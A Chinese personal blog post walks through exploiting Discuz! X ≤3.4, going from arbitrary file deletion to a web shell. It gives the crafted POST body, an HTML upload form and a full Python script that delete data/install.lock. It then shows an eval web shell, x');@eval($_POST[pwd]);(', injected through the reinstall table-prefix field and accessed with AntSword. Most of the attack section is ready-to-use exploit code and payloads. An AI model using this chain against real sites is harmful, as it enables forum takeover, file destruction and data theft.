1594天 博客通用头像 Edwiin

本人熟练掌握linux,windows的开关机,擅长nfs,samba,ftp,dhcp,bind,apache,mail等各项服务的安装与卸载,精通shell,mysql,iptables,selinux等单词的拼写,了解虚拟化,存储,集群等相关汉字的书写。

Discuz 论坛< X 3.4 从任意文件删除到getshell

发布于 2个月前 / 22 次围观 / 0 条评论 / 技术学习 / Edwiin
本文最后更新于2020-5-13,已超过 1 个月没有更新,如果文章内容或图片资源失效,请【留言反馈】,我会及时处理,谢谢!

介绍

Discuz!X社区软件,是一个采用PHP 和MySQL 等其他多种数据库构建的能优异、功能全面、安全稳定的社区论坛平台。

2017年9月29日,Discuz!修复了一个安全问题用于加强安全,这个漏洞会导致前台用户可以导致任意删除文件漏洞

2017年9月29日,知道创宇404 实验室开始应急,经过知道创宇404实验室分析确认,该漏洞于2014年6月被提交到Wooyun漏洞平台,Seebug漏洞平台收录了该漏洞漏洞编号ssvid-93588。该漏洞通过配置值,导致任意文件删除。

经过分析确认,原有的利用方式已经被修复,添加了对属的formtype判断,但修复方式不完全导致可以绕过,通过模拟文件上传可以进入其他unlink条件,实现任意文件删除漏洞

影响版本

Discuz!X ≤3.4

漏洞复现

首先新建一个用户,然后点击设置

然后在设置页面的源码中找到自己的formhash,也可以使用快捷键Ctrl+F进行检索,搜索formhash,找到自己用户名的hash值并复制下来

然后发送POST请求,我里我们删除data下的install.lock

birthprovince=../../../data/install.lock&profilesubmit=1&formhash=这里为自己的formhash
修改成功之后出生地就会变
<body>
<form action="http://域名/home.php?mod=spacecp&ac=profile&op=base&deletefile[birthprovince]=aaaaaa" method="POST" enctype="multipart/form-data">
<input type="file" name="birthprovince" id="file" />
<input type="text" name="formhash" value="你的formhash" /></p>
<input type="text" name="profilesubmit" value="1" /></p>
<input type="submit" value="Submit" />
</form>
</body>
使用浏览器打开该页面,上传一个正常的图片,然后点击Submit进行上传。
 
成功删除,现在我们来访问install,出现安装页面成功。

Python脚本(来自网络)

#!/usr/bin/env python
# -*- coding: utf-8 -*-
import requests
import re
import urllib2

‘‘‘
Discuz!X ≤3.4 任意文件删除漏洞
Write by Aaron
‘‘‘

def get_cookie():
    cookies={}
    for line in raw_cookies.split(‘;‘):  
        key,value=line.split(‘=‘,1)
        cookies[key]=value 
    return cookies
def get_formhash(url):
    cookies=get_cookie()
    testurl=url+"/home.php?mod=spacecp"  
    s=requests.get(testurl,cookies=cookies)
    com = re.compile(‘<input type="hidden" name="formhash" value="(.*?)" />‘)
    result = com.findall(s.text)
    return result[0]
def del_step1(url,filename):
    headers={‘User-Agent‘:‘Mozilla/5.0 (Windows NT 10.0; WOW64; rv:55.0) Gecko/20100101 Firefox/55.0‘}
    geturl=url+"/home.php?mod=spacecp&ac=profile&op=base"
    formhash=get_formhash(url)
    payload ={‘birthprovince‘:filename,"profilesubmit":1,"formhash":formhash}
    cookies=get_cookie()
    r = requests.post(geturl,data=payload,headers=headers,cookies=cookies)
    if r.content.find(‘parent.show_success‘)>0:
        print ‘Step1 success!!!‘
def del_step2(url):
    geturl=url+"/home.php?mod=spacecp&ac=profile&op=base&deletefile[birthprovince]=aaaaaa"
    heads={‘User-Agent‘:‘Mozilla/5.0 (Windows NT 10.0; WOW64; rv:55.0) Gecko/20100101 Firefox/55.0‘}
    formhash=get_formhash(url)
    files ={‘formhash‘:(None,formhash),‘birthprovince‘:(‘1.jpg‘,open(‘1.jpg‘,‘rb‘),‘image/jpeg‘),‘profilesubmit‘:(None,‘1‘)}
    cookies=get_cookie()
    r=requests.post(geturl,files=files,headers=heads,cookies=cookies)
    if r.text.find(‘parent.show_success‘)>0:
        print ‘Step2 success!!!‘
        
if __name__ == ‘__main__‘:
    #需要修改以下三个参数:
    #1、设置cookie
    raw_cookies="G2pl_2132_sid=sKKQZK; G2pl_2132_saltkey=Sz3Zk9qK; G2pl_2132_lastvisit=1506772875; G2pl_2132_lastact=1506779386%09home.php%09spacecp; G2pl_2132_seccode=7.aa0407e77fa5c31c1b; G2pl_2132__refer=%252Fhome.php%253Fmod%253Dspacecp%2526ac%253Dprofile%2526op%253Dbase; G2pl_2132_ulastactivity=d085JjIjS5HiG3obxleJQuw0zNYpIN60OXJV0J6di%2B8aFmKQ4u6l; G2pl_2132_auth=86c5F09hGuaZuGNPSX7Pr7Oy4Mq2B39nSviv%2FRFC8vdn1Zjb9PibvU2fN4jJr9Hr7yVNf2vH9rIXrSLWhMZk; G2pl_2132_nofavfid=1; G2pl_2132_sendmail=1; G2pl_2132_noticeTitle=1"
    #2、设置删除的文件
    filename="../../../data/install.lock"  
    #3、设置url
    url="http://127.0.0.1"
    del_step1(url,filename)    
    del_step2(url)

 

GetShell

漏洞分析地址 https://blog.csdn.net/websinesafe/article/details/81001900

数据表前缀位置填入

x');@eval($_POST[pwd]);('

然后访问http://域名/uc_server/data/config.inc.php,然后使用蚁剑连接

 

全站顶部广告位

  • 支付宝赞助图片
  • 微信赞助图片
  • QQ赞助图片
头像
描述: 还好有你,再见如初。